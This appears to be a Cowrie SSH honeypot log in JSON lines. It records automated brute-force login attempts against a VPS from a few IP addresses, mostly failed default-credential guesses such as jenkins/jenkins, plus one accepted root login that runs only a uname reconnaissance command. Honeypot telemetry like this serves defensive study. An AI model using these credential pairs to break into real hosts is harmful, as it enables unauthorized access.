{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47658,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc734184cf7b","protocol":"ssh","message":"New connection: 83.168.105.65:47658 (1.2.3.4:22) [session: fc734184cf7b]","sensor":"my-vps","timestamp":"2025-08-26T11:29:46.248031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:46.249045Z","src_ip":"83.168.105.65","session":"fc734184cf7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:46.288378Z","src_ip":"83.168.105.65","session":"fc734184cf7b"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:46.407808Z","src_ip":"83.168.105.65","session":"fc734184cf7b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:47.449509Z","src_ip":"83.168.105.65","session":"fc734184cf7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56534,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c059000b968","protocol":"ssh","message":"New connection: 212.227.125.160:56534 (1.2.3.4:22) [session: 7c059000b968]","sensor":"my-vps","timestamp":"2025-08-26T11:29:49.220408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:49.224716Z","src_ip":"212.227.125.160","session":"7c059000b968"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:49.275111Z","src_ip":"212.227.125.160","session":"7c059000b968"}
{"eventid":"cowrie.login.failed","username":"adminbnt","password":"adminbnt","message":"login attempt [adminbnt/adminbnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:49.488351Z","src_ip":"212.227.125.160","session":"7c059000b968"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:50.541852Z","src_ip":"212.227.125.160","session":"7c059000b968"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57302,"dst_ip":"1.2.3.4","dst_port":22,"session":"401dd08a1337","protocol":"ssh","message":"New connection: 212.227.125.160:57302 (1.2.3.4:22) [session: 401dd08a1337]","sensor":"my-vps","timestamp":"2025-08-26T11:29:55.014481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:55.015497Z","src_ip":"212.227.125.160","session":"401dd08a1337"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:55.067657Z","src_ip":"212.227.125.160","session":"401dd08a1337"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:55.237890Z","src_ip":"212.227.125.160","session":"401dd08a1337"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:56.289486Z","src_ip":"212.227.125.160","session":"401dd08a1337"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58084,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f7ae9170267","protocol":"ssh","message":"New connection: 212.227.125.160:58084 (1.2.3.4:22) [session: 1f7ae9170267]","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.041185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.042572Z","src_ip":"212.227.125.160","session":"1f7ae9170267"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.104479Z","src_ip":"212.227.125.160","session":"1f7ae9170267"}
{"eventid":"cowrie.login.failed","username":"downloader","password":"downloader","message":"login attempt [downloader/downloader] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.290061Z","src_ip":"212.227.125.160","session":"1f7ae9170267"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52406,"dst_ip":"1.2.3.4","dst_port":22,"session":"723a46317776","protocol":"ssh","message":"New connection: 83.168.105.65:52406 (1.2.3.4:22) [session: 723a46317776]","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.751693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.754231Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.792522Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:30:01.912717Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:30:02.013413Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:30:02.014220Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:02.061695Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:02.063491Z","src_ip":"83.168.105.65","session":"723a46317776"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:02.342082Z","src_ip":"212.227.125.160","session":"1f7ae9170267"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58860,"dst_ip":"1.2.3.4","dst_port":22,"session":"d280231ad4f9","protocol":"ssh","message":"New connection: 212.227.125.160:58860 (1.2.3.4:22) [session: d280231ad4f9]","sensor":"my-vps","timestamp":"2025-08-26T11:30:06.574187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:06.575301Z","src_ip":"212.227.125.160","session":"d280231ad4f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:06.647975Z","src_ip":"212.227.125.160","session":"d280231ad4f9"}
{"eventid":"cowrie.login.failed","username":"gnats","password":"gnats","message":"login attempt [gnats/gnats] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:07.600512Z","src_ip":"212.227.125.160","session":"d280231ad4f9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:08.668059Z","src_ip":"212.227.125.160","session":"d280231ad4f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59628,"dst_ip":"1.2.3.4","dst_port":22,"session":"0052a9453083","protocol":"ssh","message":"New connection: 212.227.125.160:59628 (1.2.3.4:22) [session: 0052a9453083]","sensor":"my-vps","timestamp":"2025-08-26T11:30:12.734262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:12.738092Z","src_ip":"212.227.125.160","session":"0052a9453083"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:12.786221Z","src_ip":"212.227.125.160","session":"0052a9453083"}
{"eventid":"cowrie.login.failed","username":"chetana","password":"chetana","message":"login attempt [chetana/chetana] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:12.991002Z","src_ip":"212.227.125.160","session":"0052a9453083"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:14.049415Z","src_ip":"212.227.125.160","session":"0052a9453083"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43382,"dst_ip":"1.2.3.4","dst_port":22,"session":"345682f5dbcd","protocol":"ssh","message":"New connection: 83.168.105.65:43382 (1.2.3.4:22) [session: 345682f5dbcd]","sensor":"my-vps","timestamp":"2025-08-26T11:30:17.324823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:17.325495Z","src_ip":"83.168.105.65","session":"345682f5dbcd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:17.361825Z","src_ip":"83.168.105.65","session":"345682f5dbcd"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:17.472110Z","src_ip":"83.168.105.65","session":"345682f5dbcd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:18.512783Z","src_ip":"83.168.105.65","session":"345682f5dbcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60400,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f14b63b3402","protocol":"ssh","message":"New connection: 212.227.125.160:60400 (1.2.3.4:22) [session: 5f14b63b3402]","sensor":"my-vps","timestamp":"2025-08-26T11:30:18.524068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:18.531970Z","src_ip":"212.227.125.160","session":"5f14b63b3402"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:18.625628Z","src_ip":"212.227.125.160","session":"5f14b63b3402"}
{"eventid":"cowrie.login.failed","username":"hapubws","password":"hapubws","message":"login attempt [hapubws/hapubws] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:19.503408Z","src_ip":"212.227.125.160","session":"5f14b63b3402"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:20.676938Z","src_ip":"212.227.125.160","session":"5f14b63b3402"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33798,"dst_ip":"1.2.3.4","dst_port":22,"session":"22464d254b01","protocol":"ssh","message":"New connection: 212.227.235.229:33798 (1.2.3.4:22) [session: 22464d254b01]","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.163517Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.164560Z","src_ip":"212.227.235.229","session":"22464d254b01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34131,"dst_ip":"1.2.3.4","dst_port":22,"session":"a082d0ea854f","protocol":"ssh","message":"New connection: 212.227.235.229:34131 (1.2.3.4:22) [session: a082d0ea854f]","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.344277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.346210Z","src_ip":"212.227.235.229","session":"a082d0ea854f"}
